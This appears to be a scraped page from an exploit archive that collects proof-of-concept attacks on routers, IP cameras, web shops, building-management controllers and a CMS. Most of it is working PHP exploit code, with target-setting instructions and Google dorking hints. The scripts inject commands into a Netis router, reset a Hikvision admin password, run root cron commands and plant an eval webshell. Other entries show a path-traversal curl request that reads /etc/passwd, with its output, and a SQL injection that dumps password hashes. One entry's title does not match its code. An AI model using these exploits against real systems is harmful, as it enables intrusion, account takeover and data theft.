Netis MW5360 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Netis MW5360 Code Injection Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.netis-systems.com/products/MW5360.html                                                                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 67 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass NetisRouterExploit {    private $targetUri;    private $cmdDelay;    public function __construct($targetUri = '/', $cmdDelay = 30) {        $this->targetUri = $targetUri;        $this->cmdDelay = $cmdDelay;    }    public function executeCommand($cmd) {        // Clean up payload file if command includes chmod        if (strpos($cmd, 'chmod +x') !== false) {            $this->registerFilesForCleanup(trim(explode('+x', $cmd)[1]));        }        // Skip command removal for payload cleanup        if (strpos($cmd, 'rm -f') === false) {            $payload = base64_encode("`$cmd`");            echo "Executing $cmd\n";            $this->sendRequest('/cgi-bin/skk_set.cgi', [                'password' => $payload,                'quick_set' => 'ap',                'app' => 'wan_set_shortcut'            ]);        }    }    public function check() {        echo "Checking if target can be exploited.\n";        $res = $this->sendRequest('/cgi-bin/skk_get.cgi', [            'mode_name' => 'skk_get',            'wl_link' => 0        ]);        if ($res === false || strpos($res['body'], 'version') === false) {            return "Unknown: No valid response received from target.";        }        preg_match('/.?(version).?\s*:\s*.?((\\|[^,])*)/', $res['body'], $matches);        if (isset($matches[2])) {            $version_number = strtoupper(trim(explode('-V', $matches[2])[1]));            $model_number = strtoupper(trim(explode('-V', $matches[2])[0]));            if (strpos($model_number, '-') !== false) {                $model_number = trim(explode('-', $model_number)[1]);            } else {                $model_number = trim(explode('(', $model_number)[1]);            }            if ($model_number == 'MW5360' && version_compare($version_number, '1.0.1.3442', '<=')) {                return "Appears: Version " . $matches[2];            }            return "Safe: Version " . $matches[2];        }        return "Safe";    }    public function exploit() {        echo "Executing exploit with payload.\n";        $this->executeCmdStager(['noconcat' => true, 'delay' => $this->cmdDelay]);    }    private function sendRequest($uri, $postData) {        $url = "http://target_ip" . $this->targetUri . $uri; // Replace 'target_ip' with actual target IP        $options = [            'http' => [                'header'  => "Content-type: application/x-www-form-urlencoded\r\n",                'method'  => 'POST',                'content' => http_build_query($postData),            ],        ];        $context  = stream_context_create($options);        $result = file_get_contents($url, false, $context);        if ($result === FALSE) {            return false;        }        return ['body' => $result];    }    private function registerFilesForCleanup($filename) {        echo "Registering $filename for cleanup.\n";        // Logic to clean up the file after execution.    }    private function executeCmdStager($options) {        echo "Executing command stager with options: " . print_r($options, true) . "\n";        // Implement the command stager logic here    }}// Usage$exploit = new NetisRouterExploit('/');$exploit->check();$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Netis MW5360 Code Injection

Hikvision IP Cameras suffer from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Hikvision IP Camera CSRF Add ADmin Vulnerability                                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.hikvision.com/                                                                                                  |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The vulnerability has been present in Hikvision products since 2014.[+] add new admin.[+] Line 104 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass HikvisionExploit {    private $target;    private $port;    private $username;    private $password;    private $id;    private $storeCred;    public function __construct($target, $port = 80, $username = 'admin', $password = 'Pa$$W0rd', $id = 1, $storeCred = true) {        $this->target = $target;        $this->port = $port;        $this->username = $username;        $this->password = $password;        $this->id = $id;        $this->storeCred = $storeCred;    }    public function check() {        $auth = base64_encode("admin:" . $this->generateRandomPassword());        $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);        $response = $this->sendRequest('GET', $url);        if (!$response) {            return 'No response received from the target!';        }        if ($response['http_code'] == 200) {            echo "Following users are available for password reset...\n";            $xml = simplexml_load_string($response['body']);            foreach ($xml->User as $user) {                echo "USERNAME: " . $user->userName . " | ID: " . $user->id . " | ROLE: " . $user->userLevel . "\n";            }            return 'Vulnerable';        } else {            return 'Safe';        }    }    public function exploit() {        if ($this->check() !== 'Vulnerable') {            return false;        }        echo "Starting the password reset for {$this->username}...\n";        $postData = "<User version=\"1.0\" xmlns=\"http://www.hikvision.com/ver10/XMLSchema\">\r\n" .            "<id>{$this->id}</id>\r\n" .            "<userName>{$this->username}</userName>\r\n" .            "<password>{$this->password}</password>\r\n</User>";        $auth = base64_encode("admin:" . $this->generateRandomPassword());        $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);        $response = $this->sendRequest('PUT', $url, $postData, 'application/xml');        if (!$response) {            echo "Target server did not respond to the password reset request\n";            return false;        }        if ($response['http_code'] == 200) {            echo "Password reset for {$this->username} was successfully completed!\n";            echo "Please log in with your new password: {$this->password}\n";            if ($this->storeCred) {                $this->reportCreds();            }        } else {            echo "Unknown Error. Password reset was not successful!\n";        }    }    private function sendRequest($method, $url, $data = null, $contentType = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        if ($contentType) {            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: $contentType"]);        }        $response = curl_exec($ch);        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['http_code' => $http_code, 'body' => $response];    }    private function generateRandomPassword($length = 10) {        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, $length);    }    private function reportCreds() {        // In a real implementation, you could store the credentials into a database        echo "Credentials for {$this->username} were added to the database...\n";    }}// Example usage$exploit = new HikvisionExploit('target-ip');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Hikvision IP Camera Cross Site Request Forgery

GeoServer version 2.25.1 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : GeoServer 2.25.1 Code Injection Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://github.com/geoserver/                                                                                               |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 118 set your target .[+] Line 123  set your command to execute.[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenMediaVaultExploit{    private $targetUri;    private $username;    private $password;    private $persistent;    private $cronUuid;    private $versionNumber;    public function __construct($targetUri, $username, $password, $persistent = false)    {        $this->targetUri = $targetUri;        $this->username = $username;        $this->password = $password;        $this->persistent = $persistent;    }    private function sendRequest($url, $data)    {        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json'        ]);        $response = curl_exec($ch);        curl_close($ch);        return json_decode($response, true);    }    public function login()    {        echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";        $data = [            'service' => 'Session',            'method' => 'login',            'params' => [                'username' => $this->username,                'password' => $this->password            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return isset($response['authenticated']) && $response['authenticated'] === true;    }    public function checkTarget()    {        echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";        $data = [            'service' => 'System',            'method' => 'getInformation',            'params' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return $response;    }    public function checkVersion($response)    {        if (!empty($response)) {            $version = $response['response']['version'] ?? null;            return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;        }        return null;    }    public function executeCommand($cmd)    {        echo "Executing command...\n";        $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';        $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';        $data = [            'service' => 'Cron',            'method' => 'set',            'params' => [                'uuid' => $uuid,                'enable' => true,                'execution' => 'exactly',                'minute' => $schedule,                'hour' => $schedule,                'dayofmonth' => $schedule,                'month' => $schedule,                'dayofweek' => $schedule,                'username' => 'root',                'command' => $cmd,                'sendemail' => false,                'comment' => '',                'type' => 'userdefined'            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        $this->cronUuid = $response['response']['uuid'] ?? '';        $this->applyConfigChanges();        echo "Cron payload execution triggered.\n";    }    public function applyConfigChanges()    {        $data = [            'service' => 'Config',            'method' => 'applyChangesBg',            'params' => [                'modules' => [],                'force' => false            ],            'options' => null        ];        $this->sendRequest($this->targetUri . '/rpc.php', $data);    }    public function removePayload()    {        if (!$this->persistent) {            $data = [                'service' => 'Cron',                'method' => 'delete',                'params' => [                    'uuid' => $this->cronUuid                ]            ];            $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);            if ($response) {                $this->applyConfigChanges();                echo "Cron payload entry successfully removed.\n";            } else {                echo "Cannot access cron services to remove payload.\n";            }        }    }}// Usage$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);if ($exploit->login()) {    $response = $exploit->checkTarget();    if ($response) {        $exploit->versionNumber = $exploit->checkVersion($response);        $exploit->executeCommand('your-command-here');        $exploit->removePayload();    }}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

GeoServer 2.25.1 Code Injection

Gambio Online Webshop version 4.9.2.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Gambio Online Webshop 4.9.2.0 Code Injection Vulnerability                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.gambio.com/                                                                                                     |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 85 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GambioExploit {    private $targetUrl;    private $webshellName;    private $postParam;    private $getParam;    private $phpCmdFunction;    public function __construct($targetUrl, $phpCmdFunction = 'passthru', $webshellName = null) {        $this->targetUrl = $targetUrl;        $this->phpCmdFunction = $phpCmdFunction;        $this->webshellName = $webshellName ?: $this->randomString() . '.php';        $this->postParam = $this->randomString();        $this->getParam = $this->randomString();    }    // Random string generator    private function randomString($length = 8) {        return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);    }    // Function to send HTTP POST request    private function sendPostRequest($uri, $data) {        $url = $this->targetUrl . $uri;        $options = [            'http' => [                'header' => "Content-type: application/x-www-form-urlencoded\r\n",                'method' => 'POST',                'content' => http_build_query($data),            ],        ];        $context = stream_context_create($options);        return file_get_contents($url, false, $context);    }    // Upload webshell to target    public function uploadWebshell() {        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $finalPayload = base64_encode(serialize([            "GuzzleHttp\\Cookie\\FileCookieJar" => [                "cookies" => [                    "GuzzleHttp\\Cookie\\SetCookie" => [                        "data" => [                            "Value" => $phpPayload,                            "Domain" => "target.com",                            "Path" => "/",                        ]                    ]                ],                "filename" => $this->webshellName            ]        ]));        $this->sendPostRequest('/shop.php?do=Parcelshopfinder/AddAddressBookEntry', [            'checkout_started' => 0,            'search' => $finalPayload,            'firstname' => 'test',            'lastname' => 'test',        ]);        echo "Webshell uploaded to: {$this->webshellName}\n";    }    // Execute PHP payload    public function executePhp($cmd) {        $payload = base64_encode($cmd);        $this->sendPostRequest("/{$this->webshellName}", [            $this->postParam => $payload        ]);        echo "Executed command via webshell: {$cmd}\n";    }    // Execute command    public function executeCommand($cmd) {        $payload = base64_encode($cmd);        $this->sendPostRequest("/{$this->webshellName}?{$this->getParam}={$this->phpCmdFunction}", [            $this->postParam => $payload        ]);        echo "Executed command: {$cmd}\n";    }}// Example Usage$exploit = new GambioExploit('https://target.com');$exploit->uploadWebshell();$exploit->executeCommand('id');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Gambio Online Webshop 4.9.2.0 Code Injection

The ABB BMS/BAS controller suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'SYSLOG' HTTP POST parameter called by the syslogSwitch.php script.

ABB Cylon Aspect 3.08.00 (syslogSwitch.php) Remote Code Execution

The ABB BMS/BAS controller suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'Footer' HTTP POST parameter called by the caldavUtil.php script.

ABB Cylon Aspect 3.08.01 (caldavUtil.php) Remote Code Execution

The ABB BMS/BAS controller suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'timeserver' HTTP POST parameter called by the setTimeServer.php script.

ABB Cylon Aspect 3.08.00 (setTimeServer.php) Remote Code Execution

The building management system suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'logFile' GET parameter via the 'logYumLookup.php' script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

ABB Cylon Aspect 3.08.01 (logYumLookup.php) Unauthenticated File Disclosure

ABB Cylon Aspect version 3.07.02 suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the file GET parameter through the downloadDb.php script is not properly verified before being used to download database files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

  
ABB Cylon Aspect 3.07.02 (downloadDb.php) Authenticated File Disclosure

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.07.02

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The building management system suffers from an authenticated arbitrary  
file disclosure vulnerability. Input passed through the 'file' GET parameter  
through the 'downloadDb.php' script is not properly verified before being used  
to download database files. This can be exploited to disclose the contents of  
arbitrary and sensitive files via directory traversal attacks.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5831  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5831.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl "http://192.168.73.31/downloadDb.php?file=../../../../../../../../etc/passwd" \  
> -H "Cookie: PHPSESSID=xxx"  
root:x:0:0:root:/home/root:/bin/sh  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
messagebus:x:999:998::/var/lib/dbus:/bin/false  
systemd-journal-gateway:x:998:995::/home/systemd-journal-gateway:  
avahi:x:997:994::/var/run/avahi-daemon:/bin/false  
avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false  
sshd:x:995:992::/var/run/sshd:/bin/false  
xuser:x:1000:1000::/home/xuser:  
ppp:x:994:65534::/dev/null:/usr/sbin/ppp-dialin  
mysql:x:993:65534::/var/mysql:  
aamtech:x:500:500::/home/aamtech:/bin/sh

ABB Cylon Aspect 3.07.02 Authenticated File Disclosure

MD-Pro version 1.0.76 suffers from remote SQL injection and shell upload vulnerabilities.

    # Exploit Title: MD-Pro 1.0.76. ( SQL injection + shell upload )# Google Dork: intext: Powered by MD-Pro# Date: 2024-08-30# Exploit Author: Emiliano Febbi# Vendor Homepage: https://www.opensourcecms.com/wp-content/uploads/MDPro-website-description.png# Software Link: https://www.opensourcecms.com/mdpro/# Version: 1.0.76.# Tested on: Windows 10        :::   :::   :::::::::                :::::::::  :::::::::   ::::::::       :+:+: :+:+:  :+:    :+:               :+:    :+: :+:    :+: :+:    :+:     +:+ +:+:+ +:+ +:+    +:+               +:+    +:+ +:+    +:+ +:+    +:+     +#+  +:+  +#+ +#+    +:+ +#++:++#++:++ +#++:++#+  +#++:++#:  +#+    +:+     +#+       +#+ +#+    +#+               +#+        +#+    +#+ +#+    +#+     #+#       #+# #+#    #+#               #+#        #+#    #+# #+#    #+#     ###       ### #########                ###        ###    ###  ######## #2024      [code] Proof of concept for MD-Pro 1.0.76. ( SQLi + shell upload )-------------------------------------------------------------Part 1-------------------------------------------------------------------------------The SQLi that I will introduce is an experimental stuff that I am not even 100% sure!#############################################################################################################################################################modules.php?op=modload&name=News&file=article&sid=-1 union all select 1,pn_name,3,4,5,6,7,pn_pass,9,10,11,12,13,14,15,16,17,18,19,20,21,22 FROM md_users--#############################################################################################################################################################-------------------------------------------------------------Part 2--------------------------------------------------------------------------------Vulnerability present in the MD-Pro module ' EW FileManager ' inside the admin panel.The extensive query is: ' index.php?module=ew_filemanager&type=admin ' of the module, now you have to make changes:1# Go to this address * index.php?module=ew_filemanager&type=admin&func=modifyconfig * and change these fields in this way:in default's directory of users files insert ' ./ ' or  ' ../ '2# Add this string in both to the modifiable extensions and to those of images ' htm,html,txt,php ' AND ' jpg,jpeg,png,bmp,gif,php ' (save all).3# Now go to File Manager (now is activated) and you can upload the shell from the basic upload form.[/code]

Tag

#php